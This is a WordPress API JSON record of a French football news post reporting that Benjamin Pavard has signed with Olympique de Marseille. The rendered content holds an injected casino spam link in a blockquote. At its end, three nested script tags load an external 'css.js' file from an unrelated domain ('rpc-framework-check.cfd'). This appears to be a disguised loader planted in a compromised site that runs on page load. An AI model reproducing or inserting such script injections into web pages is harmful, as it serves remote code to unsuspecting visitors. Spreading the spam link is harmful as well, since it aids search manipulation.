{"id":3911,"date":"2025-11-20T03:47:26","date_gmt":"2025-11-20T03:47:26","guid":{"rendered":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/?p=3911"},"modified":"2026-02-02T22:12:14","modified_gmt":"2026-02-02T22:12:14","slug":"mercato-om-benjamin-pavard-a-deja-signe-a-lom","status":"publish","type":"post","link":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/2025\/11\/20\/mercato-om-benjamin-pavard-a-deja-signe-a-lom\/","title":{"rendered":"Mercato OM &#8211; Benjamin Pavard a d\u00e9j\u00e0 sign\u00e9 \u00e0 l\u2019OM ?"},"content":{"rendered":"<h1>Mercato OM &#8211; Benjamin Pavard a d\u00e9j\u00e0 sign\u00e9 \u00e0 l\u2019OM ?<\/h1>\n<p>D\u2019apr\u00e8s les informations de <em>L\u2019\u00c9quipe<\/em>, <strong>Benjamin Pavard<\/strong> a officiellement sign\u00e9 son contrat avec l\u2019Olympique de Marseille. Le d\u00e9fenseur champion du monde 2018 quitte l\u2019Inter Milan pour rejoindre le club phoc\u00e9en dans le cadre d\u2019un pr\u00eat payant, assorti d\u2019une option d\u2019achat \u00e9valu\u00e9e \u00e0 15 M\u20ac.<\/p>\n<blockquote><p><strong><a href=\"https:\/\/casino-sultan-fr.com\/contato\/\" target=\"_blank\" rel=\"dofollow\">Support client de Casino Vert \u2764\ufe0f : un service disponible 24h\/24<\/a><\/strong> &#8211; Vous jouez sur Casino Sultan et vous vous demandez si le casino sultan Service client est \u00e0 la hauteur de votre exigence ? Que se passe-t-il si un probl\u00e8me<\/p><\/blockquote>\n<p>\u00c0 29 ans, Pavard apporterait une exp\u00e9rience internationale et une polyvalence bienvenue \u00e0 la d\u00e9fense olympienne, en difficult\u00e9 depuis plusieurs semaines. Capable d\u2019\u00e9voluer en charni\u00e8re centrale comme sur le c\u00f4t\u00e9 droit, il devient une pi\u00e8ce ma\u00eetresse attendue du syst\u00e8me de Roberto De Zerbi.<\/p>\n<p>Avec les arriv\u00e9es d\u2019O\u2019Riley, Aguerd et Emerson Palmieri, l\u2019OM confirme son mercato ambitieux et attire une nouvelle figure majeure du football fran\u00e7ais. Pavard retrouvera ainsi la Ligue 1 sept ans apr\u00e8s l\u2019avoir quitt\u00e9e, avec l\u2019ambition de s\u2019imposer rapidement au V\u00e9lodrome.<\/p>\n<p><button class=\"button_button__AbnlE button_md__HB_Xg button_blue__rWPTN\">Retrouvez le tableau des transferts de l&#x27;OM ici<\/button><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Mercato OM &#8211; Benjamin Pavard a d\u00e9j\u00e0 sign\u00e9 \u00e0 l\u2019OM ? D\u2019apr\u00e8s les informations de L\u2019\u00c9quipe, Benjamin Pavard a officiellement sign\u00e9 son contrat avec l\u2019Olympique de Marseille. Le d\u00e9fenseur champion&#8230;<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[19],"tags":[],"class_list":{"0":"post-3911","1":"post","2":"type-post","3":"status-publish","4":"format-standard","6":"category-cassino"},"_links":{"self":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/3911","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/comments?post=3911"}],"version-history":[{"count":4,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/3911\/revisions"}],"predecessor-version":[{"id":14916,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/3911\/revisions\/14916"}],"wp:attachment":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/media?parent=3911"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/categories?post=3911"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/tags?post=3911"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}